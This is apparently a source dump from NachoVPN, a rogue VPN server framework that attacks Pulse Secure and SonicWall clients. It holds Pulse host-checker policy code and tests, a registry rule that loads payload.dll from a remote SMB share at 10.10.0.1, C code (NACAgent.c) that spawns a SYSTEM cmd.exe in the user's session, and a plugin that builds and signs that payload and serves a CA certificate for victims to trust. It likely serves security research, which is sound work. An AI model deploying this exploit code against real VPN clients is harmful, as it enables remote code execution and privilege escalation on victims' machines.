                # Add AVPs
                for avp in avp_list:
                    eap_data += avp.to_bytes(include_padding=True)
                # Construct EAP packet
                eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x06, eap_data=eap_data)
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FB, message_value=eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

            elif eap_in.length == 0x0C and self.expanded_juniper_subtype(eap_in.eap_data) == 1:
                # Now the client sends an EAP_RESPONSE ..
                # containing an empty EXPANDED_JUNIPER structure with subtype 0x01
                """
                # Client:
                # IFT_CLIENT_AUTH_RESPONSE: Id=0x0000
                #   EAP: Vendor=JUNIPER_1, Code=EAP_RESPONSE, Id=0x06, Length=0x0C
                #     EXPANDED_JUNIPER: Subtype=0x01
                => 0000000000  00 00 55 97 00 00 00 06 00 00 00 20 00 00 00 00  ..U........ ....
                => 0000000010  00 0a 4c 01 02 06 00 0c fe 00 0a 4c 00 00 00 01  ..L........L....
                """
                # we can just reply to with an EAP_FAILURE
                """
                # Server:
                # IFT_CLIENT_AUTH_CHALLENGE: Id=0x01fc
                #   EAP: Vendor=JUNIPER_1, Code=EAP_FAILURE, Id=0x06, Length=0x04
                <= 0000000000  00 00 55 97 00 00 00 05 00 00 00 18 00 00 01 fc  ..U.............
                <= 0000000010  00 0a 4c 01 04 06 00 04  ..L.....
                """
                self.logger.error('Host checker NOT OK')
                # Construct EAP packet
                eap = EAPPacket(vendor=JUNIPER_1, code=EAP_FAILURE, identifier=0x06, eap_data=bytearray())
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=IFT_CLIENT_AUTH_CHALLENGE, message_identifier=0x01FC, message_value=eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

            # Receive host-checker policy request and send back policy
            elif self.is_policy_request(eap_in.eap_data):
                self.logger.info('Received host-checker policy request.')
                # defensive: the outer branch already requires host_checker_rules
                if not self.host_checker_rules:
                    self.logger.error("No host checker rules loaded. Not sending policy.")
                    return outbuf
                # EAP within AVP within EAP within IF-T/TLS
                outer_eap_data = bytearray()
                outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')   # EXPANDED_JUNIPER
                outer_eap_data += (1).to_bytes(4, 'big')                # subtype
                # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
                inner_eap_data = bytearray()
                inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')   # EXPANDED_JUNIPER
                inner_eap_data += (3).to_bytes(4, 'big')                # subtype (host checker)
                inner_eap_data += (1).to_bytes(1, 'big')                # number of policies
                self.logger.info(f'Sending host checker policy: {self.host_checker_policy_id}')
                commands = FunkManager.registry_command(rules=self.host_checker_rules, server_time=True, policy_id=self.host_checker_policy_id)
                policy = FunkManager.generate(commands)
                self.logger.info(f'Generated host checker policy: {policy.hex()}')
                # Wrap it in an EAP request
                inner_eap_data += policy
                inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x02, eap_data=inner_eap_data)
                # Build the AVP data from inner EAP data (without vendor)
                avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
                # Add AVP data to outer EAP data
                outer_eap_data += avp.to_bytes(include_padding=True)
                # Construct outer EAP packet
                outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x04, eap_data=outer_eap_data)
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F9, message_value=outer_eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

            # Prompt for host-checker policy
            elif self.is_client_info(eap_in.eap_data):
                self.logger.info('Received AVP structures with OS data. Prompting for host checker..')
                # The client indicated that the policy was not OK, so we need to send a remediation packet
                # EAP within AVP within EAP within IF-T/TLS
                outer_eap_data = bytearray()
                outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                outer_eap_data += (1).to_bytes(4, 'big')
                # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
                inner_eap_data = bytearray()
                inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
                inner_eap_data += (3).to_bytes(4, 'big')
                inner_eap_data += b'\x21'   # unknown: prompt for host-checker policy request
                inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x01, eap_data=inner_eap_data)
                # Build the AVP data from inner EAP data (without vendor)
                avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
                # Add AVP data to outer EAP data
                outer_eap_data += avp.to_bytes(include_padding=True)
                # Construct outer EAP packet
                outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=outer_eap_data)
                # Build IFT packet
                reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F8, message_value=outer_eap.to_bytes())
                # Append to output buffer
                outbuf += reply.to_bytes()

        return outbuf

    def _wrap_packet(self, packet_data, client):
        """Wrap an IP packet in IF-T/TLS format."""
        # Create IF-T packet with the IP packet as the message value
        packet = IFTPacket(
            vendor_id=VENDOR_JUNIPER,
            message_type=0x4,
            message_identifier=0,
            message_value=packet_data
        )
        return packet.to_bytes()

    def handle_data(self, data, client_socket, client_ip):
        """Main per-connection loop: frame IF-T/TLS messages off the socket.

        *data* is any bytes already read before dispatch; further bytes are
        read in self.buffer_size chunks. Returns True on clean shutdown,
        False when an invalid frame length forces a disconnect.
        """
        try:
            client_socket.setblocking(True)
            client_socket.settimeout(10)
            # NOTE(review): if create_session() raises, connection_id is never
            # bound and the destroy_session() call in finally raises NameError
            # (silently swallowed by the inner except). Harmless today, but fragile.
            connection_id, _ = self.packet_handler.create_session(client_socket, self._wrap_packet)
            buf = bytearray()
            if data:
                buf.extend(data)
            while True:
                # Read more data if we don't have a full header
                while len(buf) < 16:
                    try:
                        chunk = client_socket.recv(self.buffer_size)
                        if not chunk:
                            return True
                        buf.extend(chunk)
                    except (socket.timeout, ssl.SSLWantReadError, BlockingIOError):
                        continue
                # Parse the message length from the header
                msg_len = int.from_bytes(buf[8:12], 'big')
                if msg_len < 16 or msg_len > self.max_packet_size:
                    self.logger.error(f"Invalid IF-T/TLS length {msg_len}; dropping connection")
                    return False
                # If we don't have the full message yet, read more
                if len(buf) < msg_len:
                    try:
                        chunk = client_socket.recv(self.buffer_size)
                        if not chunk:
                            return True
                        buf.extend(chunk)
                        continue
                    except (socket.timeout, ssl.SSLWantReadError, BlockingIOError):
                        continue
                # We have a full message
                packet = bytes(buf[:msg_len])
                del buf[:msg_len]
                try:
                    # Pass connection_id to process
                    resp = self.process(packet, client_socket, connection_id)
                    if resp:
                        client_socket.sendall(resp)
                except Exception as e:
                    self.logger.error(f"Error processing packet: {e}")
        except Exception as e:
            self.logger.error(f"Error in handle_data: {e}")
        finally:
            try:
                self.packet_handler.destroy_session(connection_id)
                client_socket.close()
            except Exception:
                pass
        return True

    def process(self, data, client_socket, connection_id):
        """Parse a complete IF-T/TLS frame and build any response frames"""
        outbuf = bytearray()
        # a single recv'd buffer may contain several concatenated IF-T packets
        while data:
            # Parse a single IF-T/TLS packet
            self.logger.debug(f'inbuf: {data.hex()}')
            try:
                reader = io.BytesIO(data)
                packet = IFTPacket.from_io(reader)
                data = reader.read()
            except Exception as e:
                self.logger.error(f'Failed to parse IF-T/TLS packet: {e}')
                break
            # Handle packet types
            if packet.message_type == IFT_VERSION_REQUEST:
                self.logger.info('Got IFT_VERSION_REQUEST')
                reply = IFTPacket(
                    vendor_id=VENDOR_TCG,
                    message_type=IFT_VERSION_RESPONSE,
                    message_identifier=0x01F5,
                    message_value=(2).to_bytes(4, 'big')   # version 2
                )
                outbuf += reply.to_bytes()
            elif packet.message_type == IFT_TLS_CLIENT_INFO:
                self.logger.info('Got IFT_TLS_CLIENT_INFO')
                auth_data = packet.message_value.decode(errors='ignore').strip('\x00\n')
                self.logger.info(f'Client info: {auth_data}')
                reply = IFTPacket(
                    vendor_id=VENDOR_TCG,
                    message_type=IFT_CLIENT_AUTH_CHALLENGE,
                    message_identifier=0x01F6,
                    message_value=JUNIPER_1.to_bytes(4, 'big')
                )
                outbuf += reply.to_bytes()
            elif packet.message_type == IFT_CLIENT_AUTH_RESPONSE:
                self.logger.info('Got IFT_CLIENT_AUTH_RESPONSE')
                outbuf += self.parse_eap_packet(packet.message_value, client_socket, connection_id)
            elif packet.message_type == 0x89:
                # Logout request
                self.logger.info('Got logout request')
                return bytearray()
            elif packet.message_type == 0x4:
                # Tunnelled IP packet
                if packet.message_value and packet.message_value[0] == 0x45:   # IPv4
                    self.logger.debug('Got IP packet')
                    self.packet_handler.handle_client_packet(
                        packet.message_value, connection_id
                    )
        self.logger.debug(f'outbuf: {outbuf.hex()}')
        return outbuf


================================================
FILE: src/nachovpn/plugins/pulse/test/example_rules.json
================================================
[
    {
        "rulename": "AllowInsecureGuestAuth",
        "subkey": "SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters",
        "regname": "AllowInsecureGuestAuth",
        "hive": "HKEY_LOCAL_MACHINE",
        "value": 1,
        "type": "DWORD"
    },
    {
        "rulename": "Payload",
        "subkey": "SOFTWARE\\Microsoft\\Wow64\\x86",
        "regname": "ipconfig.exe",
        "hive": "HKEY_LOCAL_MACHINE",
        "value": "\\\\10.10.0.1\\share\\payload.dll",
        "type": "String"
    }
]


================================================
FILE: src/nachovpn/plugins/pulse/test/test_policy.py
================================================
from nachovpn.plugins.pulse.funk_parser import FunkManager
from nachovpn.plugins.pulse.plugin import AVP, EAPPacket, IFTPacket, EXPANDED_JUNIPER, \
    JUNIPER_1, EAP_REQUEST, VENDOR_TCG, AVP_CODE_EAP_MESSAGE, IFT_CLIENT_AUTH_CHALLENGE

import os
import zlib
import logging
import difflib

logging.basicConfig(level=logging.DEBUG)


def hexdump(data: bytes):
    """Print *data* as a classic 16-bytes-per-row hex + ASCII dump."""
    def to_printable_ascii(byte):
        return chr(byte) if 32 <= byte <= 126 else "."
    offset = 0
    while offset < len(data):
        chunk = data[offset : offset + 16]
        hex_values = " ".join(f"{byte:02x}" for byte in chunk)
        ascii_values = "".join(to_printable_ascii(byte) for byte in chunk)
        print(f"{offset:08x} {hex_values:<48} |{ascii_values}|")
        offset += 16


def build_remediation_packet():
    """Build a full IF-T/TLS remediation packet (EAP in AVP in EAP in IF-T)."""
    outbuf = b''
    # EAP within AVP within EAP within IF-T/TLS
    outer_eap_data = b''
    outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
    outer_eap_data += (1).to_bytes(4, 'big')
    # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
    inner_eap_data = b''
    inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
    inner_eap_data += (3).to_bytes(4, 'big')
    inner_eap_data += b'\x01'   # no idea, maybe number of policies?
    # Build a host-checker policy with a registry command
    commands = FunkManager.remediation_command()
    policy = FunkManager.generate(commands)
    # Wrap it in an EAP request
    inner_eap_data += policy
    inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x03, eap_data=inner_eap_data)
    # Build the AVP data from inner EAP data (without vendor)
    avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
    # Add AVP data to outer EAP data
    outer_eap_data += avp.to_bytes(include_padding=True)
    print (f'Padding required: {avp.padding_required()}')
    # Construct outer EAP packet
    outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x05, eap_data=outer_eap_data)
    # Build IFT packet
    reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01FA, message_value=outer_eap.to_bytes())
    # Append to output buffer
    outbuf += reply.to_bytes()
    return outbuf


def build_policy():
    """Build a full IF-T/TLS host-checker policy packet with a registry command."""
    outbuf = b''
    # EAP within AVP within EAP within IF-T/TLS
    outer_eap_data = b''
    outer_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
    outer_eap_data += (1).to_bytes(4, 'big')
    # This is the EAP data encapsulated in AVP (which is itself encapsulated in EAP/IF-T/TLS)
    inner_eap_data = b''
    inner_eap_data += EXPANDED_JUNIPER.to_bytes(4, 'big')
    inner_eap_data += (3).to_bytes(4, 'big')
    inner_eap_data += b'\x01'   # no idea, maybe number of policies?
    # Build a host-checker policy with a registry command
    commands = FunkManager.registry_command()
    policy = FunkManager.generate(commands)
    # Wrap it in an EAP request
    inner_eap_data += policy
    inner_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x02, eap_data=inner_eap_data)
    # Build the AVP data from inner EAP data (without vendor)
    avp = AVP(code=0x4f, flags=0x40, value=inner_eap.to_bytes()[4:])
    # Add AVP data to outer EAP data
    outer_eap_data += avp.to_bytes(include_padding=True)
    print (f'Padding required: {avp.padding_required()}')
    # Construct outer EAP packet
    outer_eap = EAPPacket(vendor=JUNIPER_1, code=EAP_REQUEST, identifier=0x04, eap_data=outer_eap_data)
    # Build IFT packet
    reply = IFTPacket(vendor_id=VENDOR_TCG, message_type=0x05, message_identifier=0x01F9, message_value=outer_eap.to_bytes())
    # Append to output buffer
    outbuf += reply.to_bytes()
    return outbuf


def compare(file_1, file_2):
    """Byte-diff two files, printing a unified hex diff (or a success message)."""
    with open(file_1, 'rb') as f:
        example_bytes = f.read()
    with open(file_2, 'rb') as f:
        generated_data = f.read()
    # Diff generated data with example file
    bytes1 = list(example_bytes)
    bytes2 = list(generated_data)
    diff = difflib.unified_diff(
        [f"{b:02x}" for b in bytes1],
        [f"{b:02x}" for b in bytes2],
        lineterm=""
    )
    same = True
    for line in diff:
        print(line)
        same = False
    if same:
        print('> No differences found!')


def build_remediation():
    """Return just the generated remediation policy bytes (no IF-T framing)."""
    commands = FunkManager.remediation_command()
    return FunkManager.generate(commands)


def generate_example_files():
    """Write golden example binaries (captured from real traffic) for comparison."""
    os.makedirs(os.path.join(os.path.dirname(__file__), 'examples'), exist_ok=True)

    # generate example IF-T / host-checker policy
    client_policy_file = os.path.join(os.path.dirname(__file__), 'examples', 'client_policy_packet.bin')
    client_policy_data = bytearray()
    client_policy_data += bytes.fromhex('00 00 55 97 00 00 00 05 00 00 01 CC 00 00 01 F9')
    client_policy_data += bytes.fromhex('00 0A 4C 01 01 04 01 B8 FE 00 0A 4C 00 00 00 01')
    client_policy_data += bytes.fromhex('00 00 00 4F 40 00 01 A9 01 02 01 A1 FE 00 0A 4C')
    client_policy_data += bytes.fromhex('00 00 00 03 01 00 00 00 16 C0 00 01 93 00 00 05')
    client_policy_data += bytes.fromhex('83 00 00 02 78 78 9C 8D 52 CB 4A 03 31 14 8D 85')
    client_policy_data += bytes.fromhex('6E A4 0B 57 AE 87 F9 82 A6 D6 56 18 23 0C B5 52')
    client_policy_data += bytes.fromhex('B1 2F 5A 1F 28 C2 90 49 2E 35 3A 93 0C 49 A6 B5')
    client_policy_data += bytes.fromhex('D0 85 E0 8F F9 31 82 1F E0 0F 98 99 AA 88 14 34')
    client_policy_data += bytes.fromhex('AB 7B 0F 27 E7 9E 7B B8 08 D5 5E 5F 50 E5 0E A1')
    client_policy_data += bytes.fromhex('EA 33 42 B5 B7 17 84 2E CA BA FA BC 7B 38 0E 27')
    client_policy_data += bytes.fromhex('E1 C0 1B 86 83 2E F1 C7 54 D3 14 2C E8 BA EF 5D')
    client_policy_data += bytes.fromhex('86 FD 0B 07 05 0C B4 8D 52 BE 4F 02 03 7A 0E 3A')
    client_policy_data += bytes.fromhex('B2 22 05 82 DB 8D 36 3E 68 E3 46 CB 3F DA 46 E5')
    client_policy_data += bytes.fromhex('2B 74 2B 95 6F DD AC D0 F2 A4 D3 23 7E F6 A5 8B')
    client_policy_data += bytes.fromhex('7D 6F 4E 93 DC 41 2A BE 07 66 23 99 A7 31 68 82')
    client_policy_data += bytes.fromhex('03 2F D3 6A 2E B8 AB 35 CC 84 B1 7A 19 78 3A 4F')
    client_policy_data += bytes.fromhex('40 70 4C EA EB B2 D0 C2 64 A1 94 75 FD 27 29 7A')
    client_policy_data += bytes.fromhex('80 25 26 BD B3 EE 75 D4 1F 75 C2 7E 34 08 3B BD')
    client_policy_data += bytes.fromhex('D3 61 F7 07 C3 E4 71 49 9A 8E 4E CE AF C2 49 F7')
    client_policy_data += bytes.fromhex('B6 93 50 63 C0 DC D2 98 FD A0 6D 54 B7 CB CC 81')
    client_policy_data += bytes.fromhex('53 AB 85 9C 95 F0 A5 80 45 AB 89 0B C3 A9 90 2E')
    client_policy_data += bytes.fromhex('8E 6F 77 1A 52 E0 C4 80 FB 2E 01 B8 19 28 29 AC')
    client_policy_data += bytes.fromhex('2A 3E 16 64 B7 9F 4A 04 5B 92 39 AB AF 9A 7B AB')
    client_policy_data += bytes.fromhex('75 17 35 56 78 F5 6B 64 99 0F 26 AC C7 F3 9B 90')
    client_policy_data += bytes.fromhex('90 C0 8B A9 81 56 13 24 53 1C 5C 18 D8 05 BE 39')
    client_policy_data += bytes.fromhex('DC C6 3F C2 5D CF E5 D4 D2 BF 1D B9 A5 98 CA A5')
    client_policy_data += bytes.fromhex('2D 04 E0 31 D3 60 8C 50 F2 F4 D8 38 53 4C 49 2E')
    client_policy_data += bytes.fromhex('AC 6B 69 E2 02 F0 BD CF 23 A8 BD 3F 21 B4 B3 BE')
    client_policy_data += bytes.fromhex('33 B4 F5 01 ED 71 D0 C2 00 00 00 00')
    with open(client_policy_file, 'wb') as f:
        f.write(client_policy_data)

    # generate full remediation packet
    remediation_packet_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_packet.bin')
    remediation_packet_data = bytearray()
    remediation_packet_data += bytes.fromhex('00 00 55 97 00 00 00 05 00 00 00 B8 00 00 01 FA')
    remediation_packet_data += bytes.fromhex('00 0A 4C 01 01 05 00 A4 FE 00 0A 4C 00 00 00 01')
    remediation_packet_data += bytes.fromhex('00 00 00 4F 40 00 00 95 01 03 00 8D FE 00 0A 4C')
    remediation_packet_data += bytes.fromhex('00 00 00 03 01 00 00 00 16 C0 00 00 7F 00 00 05')
    remediation_packet_data += bytes.fromhex('83 00 00 00 94 78 9C 63 60 E0 79 72 80 81 81 87')
    remediation_packet_data += bytes.fromhex('81 81 B5 19 48 7D 00 B2 33 A0 EC 8F 40 B6 00 88')
    remediation_packet_data += bytes.fromhex('5D 92 5A 5C C2 00 51 E7 03 95 7B 0E 64 DB 81 D9')
    remediation_packet_data += bytes.fromhex('AC CD 62 41 AE BE AE 2E 9E 8E 21 AE 56 01 FE 3E')
    remediation_packet_data += bytes.fromhex('9E CE 91 9E 2E B6 65 C9 06 35 26 C6 35 05 F9 39')
    remediation_packet_data += bytes.fromhex('99 C9 95 F1 46 35 86 35 E5 F9 F9 25 3A C5 A9 40')
    remediation_packet_data += bytes.fromhex('83 40 40 08 66 36 90 CD 08 34 EF 73 03 12 1F 00')
    remediation_packet_data += bytes.fromhex('25 39 21 7B 00')
    remediation_packet_data += bytes.fromhex('00 00 00')   # padding (client sends A0 6D 9C)
    with open(remediation_packet_file, 'wb') as f:
        f.write(remediation_packet_data)

    # generate example remediation policy
    remediation_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation.bin')
    remediation_data = bytearray()
    remediation_data += bytes.fromhex('00 00 00 16 C0 00 00 7F 00 00 05 83 00 00 00 94')
    remediation_data += bytes.fromhex('78 9C 63 60 E0 79 72 80 81 81 87 81 81 B5 19 48')
    remediation_data += bytes.fromhex('7D 00 B2 33 A0 EC 8F 40 B6 00 88 5D 92 5A 5C C2')
    remediation_data += bytes.fromhex('00 51 E7 03 95 7B 0E 64 DB 81 D9 AC CD 62 41 AE')
    remediation_data += bytes.fromhex('BE AE 2E 9E 8E 21 AE 56 01 FE 3E 9E CE 91 9E 2E')
    remediation_data += bytes.fromhex('B6 65 C9 06 35 26 C6 35 05 F9 39 99 C9 95 F1 46')
    remediation_data += bytes.fromhex('35 86 35 E5 F9 F9 25 3A C5 A9 40 83 40 40 08 66')
    remediation_data += bytes.fromhex('36 90 CD 08 34 EF 73 03 12 1F 00 25 39 21 7B 00')
    with open(remediation_file, 'wb') as f:
        f.write(remediation_data)

    # decompress the zlib payload (offset 0x10 skips the AVP framing)
    remediation_uncompressed_file = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_uncompressed.bin')
    remediation_uncompressed_data = zlib.decompress(remediation_data[0x10:])
    with open(remediation_uncompressed_file, 'wb') as f:
        f.write(remediation_uncompressed_data)


# -- script body: regenerate goldens, build packets, diff, then clean up --

# create example files
generate_example_files()

# build + test IF-T packet
client_policy_packet_file = os.path.join(os.path.dirname(__file__), 'generated_client_policy_packet.bin')
example_client_policy_packet = os.path.join(os.path.dirname(__file__), 'examples', 'client_policy_packet.bin')
data = build_policy()
print('\n> Generated client policy packet:')
hexdump(data)
with open(client_policy_packet_file, 'wb') as f:
    f.write(data)
print('\n> Comparing client policy packet with example:')
compare(example_client_policy_packet, client_policy_packet_file)

# Test remediation policy
remediation_file = os.path.join(os.path.dirname(__file__), 'generated_remediation.bin')
example_remediation = os.path.join(os.path.dirname(__file__), 'examples', 'remediation.bin')
# Uncompressed remediation policy
example_remediation_uncompressed = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_uncompressed.bin')
remediation_uncompressed = os.path.join(os.path.dirname(__file__), 'generated_remediation_uncompressed.bin')
data = build_remediation()
print('\n> Generated remediation data:')
hexdump(data)
# write remediation data to file
with open(remediation_file, 'wb') as f:
    f.write(data)
# write uncompressed remediation data to file
with open(remediation_uncompressed, 'wb') as f:
    f.write(zlib.decompress(data[0x10:]))
print('\n> Comparing remediation data with example (uncompressed):')
compare(example_remediation_uncompressed, remediation_uncompressed)
print('\n> Comparing remediation data with example (compressed):')
compare(example_remediation, remediation_file)

# generate remediation full packet
remediation_packet_file = os.path.join(os.path.dirname(__file__), 'generated_remediation_packet.bin')
example_remediation_packet = os.path.join(os.path.dirname(__file__), 'examples', 'remediation_packet.bin')
data = build_remediation_packet()
print('\n> Generated remediation packet:')
hexdump(data)
with open(remediation_packet_file, 'wb') as f:
    f.write(data)
print('\n> Comparing remediation packet with example:')
compare(example_remediation_packet, remediation_packet_file)

# Cleanup
os.remove(client_policy_packet_file)
os.remove(remediation_file)
os.remove(remediation_uncompressed)
os.remove(remediation_packet_file)


================================================
FILE: src/nachovpn/plugins/sonicwall/__init__.py
================================================
from .plugin import SonicWallPlugin

__all__ = ['SonicWallPlugin']


================================================
FILE: src/nachovpn/plugins/sonicwall/files/NACAgent.c
================================================
/* NOTE(review): the header names were lost in extraction (angle-bracket
 * contents stripped). Based on the APIs used below they are presumably
 * windows.h, tlhelp32.h, wtsapi32.h, userenv.h and stdbool.h — confirm
 * against the original file before building. */
#include
#include
#include
#include
#include

#pragma comment(lib, "wtsapi32.lib")
#pragma comment(lib, "userenv.lib")

/* Return the PID of the first process whose image name matches
 * processName, or 0 if not found / snapshot failed. */
DWORD FindProcessId(const wchar_t* processName)
{
    PROCESSENTRY32W processInfo;
    processInfo.dwSize = sizeof(processInfo);
    HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (processesSnapshot ==
INVALID_HANDLE_VALUE) { return 0; } if (Process32FirstW(processesSnapshot, &processInfo)) { if (wcscmp(processName, processInfo.szExeFile) == 0) { CloseHandle(processesSnapshot); return processInfo.th32ProcessID; } } while (Process32NextW(processesSnapshot, &processInfo)) { if (wcscmp(processName, processInfo.szExeFile) == 0) { CloseHandle(processesSnapshot); return processInfo.th32ProcessID; } } CloseHandle(processesSnapshot); return 0; } bool PopSystemShell() { BOOL bSuccess = FALSE; STARTUPINFOW si; PROCESS_INFORMATION pi; TOKEN_PRIVILEGES tp; LUID luid; HANDLE oldToken = NULL; HANDLE newToken = NULL; HANDLE privToken = NULL; LPVOID pEnv = NULL; DWORD dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.lpDesktop = L"Winsta0\\default"; ZeroMemory(&pi, sizeof(pi)); DWORD sessionId; DWORD dwPid = FindProcessId(L"NEGui.exe"); ProcessIdToSessionId(dwPid, &sessionId); if (sessionId == 0xFFFFFFFF || sessionId == 0) { goto CLEANUP_EXIT; } if (WTSQueryUserToken(sessionId, &oldToken)) { if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | TOKEN_READ | TOKEN_WRITE, &privToken)) { goto CLEANUP_EXIT; } // Enable SeDebugPrivilege if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { goto CLEANUP_EXIT; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Duplicate our token to &newToken if (!DuplicateTokenEx(privToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &newToken)) { goto CLEANUP_EXIT; } if (!SetTokenInformation(newToken, TokenSessionId, (void*)&sessionId, sizeof(DWORD))) { goto CLEANUP_EXIT; } if (!AdjustTokenPrivileges(newToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL)) { goto CLEANUP_EXIT; } if (CreateEnvironmentBlock(&pEnv, newToken, TRUE)) { dwCreationFlags |= CREATE_UNICODE_ENVIRONMENT; } // Create 
process for user with desktop
    if (!CreateProcessAsUserW(newToken, L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE,
                              dwCreationFlags, pEnv, L"C:\\Windows\\System32\\", &si, &pi)) {
        goto CLEANUP_EXIT;
    }
    bSuccess = TRUE;
    }

CLEANUP_EXIT:
    /* Release every handle and the environment block opened above. */
    if (oldToken != NULL) CloseHandle(oldToken);
    if (newToken != NULL) CloseHandle(newToken);
    if (privToken != NULL) CloseHandle(privToken);
    if (pi.hProcess != NULL) CloseHandle(pi.hProcess);
    if (pi.hThread != NULL) CloseHandle(pi.hThread);
    if (pEnv != NULL) DestroyEnvironmentBlock(pEnv);
    return bSuccess;
}

/* Exit 0 when PopSystemShell spawned the shell, 1 otherwise. */
int main() {
    if (PopSystemShell()) {
        return 0;
    } else {
        return 1;
    }
}
================================================ FILE: src/nachovpn/plugins/sonicwall/plugin.py ================================================
from nachovpn.plugins import VPNPlugin
from flask import Flask, jsonify, request, abort, send_file, make_response
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.backends import default_backend
from cryptography.x509.oid import ExtendedKeyUsageOID
import logging
import datetime
import subprocess
import shutil
import urllib.parse
import base64
import uuid
import json
import os


class SonicWallPlugin(VPNPlugin):
    """VPNPlugin that emulates a SonicWall SMA / NetExtender endpoint.

    Serves the NetExtender CGI endpoints, a code-signed NACAgent.exe payload
    built from files/NACAgent.c, and an auto-launch page for the
    sonicwallconnectagent:// URI handler.
    """

    def __init__(self, *args, **kwargs):
        # provide the templates directory relative to this plugin
        super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates'))
        # payloads are written under the current working directory
        self.payload_dir = os.path.join(os.getcwd(), 'payloads')
        self.files_dir = os.path.join(os.path.dirname(__file__), 'files')
        os.makedirs(self.payload_dir, exist_ok=True)
        # compile/sign NACAgent.exe up front so it can be served immediately
        self.setup_payload()

    def can_handle_data(self, data, client_socket, client_ip):
        """Raw-socket handling is declined; this plugin is HTTP-only."""
        # CONNECT tunnel is not currently supported
        return False

    def can_handle_http(self, handler):
        """Claim requests from SonicWall client User-Agents or the /sonicwall paths."""
        user_agent = handler.headers.get('User-Agent', '')
        if 'SonicWALL NetExtender' in user_agent or \
           'SMA Connect Agent' in user_agent or \
           handler.path == '/sonicwall' or \
           handler.path == '/sonicwall/ca.crt':
            return True
        return False

    def random_swap(self):
        """Return a random, double-base64-encoded value for the 'swap' cookie."""
        return base64.b64encode(base64.b64encode(os.urandom(32))).decode()

    def _setup_routes(self):
        """Register the SonicWall-specific Flask routes on top of the base set."""
        # Call the parent class's route setup
        super()._setup_routes()

        # NOTE(review): `Response` is used below but only `make_response` is
        # imported from flask in this module — confirm Response resolves at runtime.
        @self.flask_app.route('/', defaults={'path': ''}, methods=['CONNECT'])
        @self.flask_app.route('/', methods=['CONNECT'])
        def handle_connect(path):
            # log everything about the (unsupported) CONNECT attempt for analysis
            self.logger.info(f"handle CONNECT: {path}")
            self.logger.info(request.headers)
            self.logger.info(request.cookies)
            self.logger.info(request.data)
            self.logger.info(request.args)
            self.logger.info(request.form)
            self.logger.info(request.endpoint)
            self.logger.info(request.method)
            self.logger.info(request.remote_addr)
            return Response("Connection Established", status=200, mimetype='text/plain')

        @self.flask_app.route('/sonicwall/ca.crt')
        def cert():
            # serve the generated CA certificate so a victim can install/trust it
            cert_path = os.path.join(os.getcwd(), 'certs', 'ca.crt')
            if not os.path.exists(cert_path):
                return abort(404)
            return send_file(cert_path)

        @self.flask_app.route('/cgi-bin/welcome')
        def welcome():
            return self.render_template('welcome.html')

        @self.flask_app.route('/cgi-bin/userLogin', methods = ['POST', 'GET'])
        def user_login():
            # any login succeeds; issue a fresh session 'swap' cookie
            resp = Response('')
            resp.set_cookie('swap', self.random_swap())
            return resp

        @self.flask_app.route('/cgi-bin/sslvpnclient', methods = ['POST', 'GET'])
        def ssl_vpnclient():
            # dispatch on the query/form parameter the NetExtender client sends
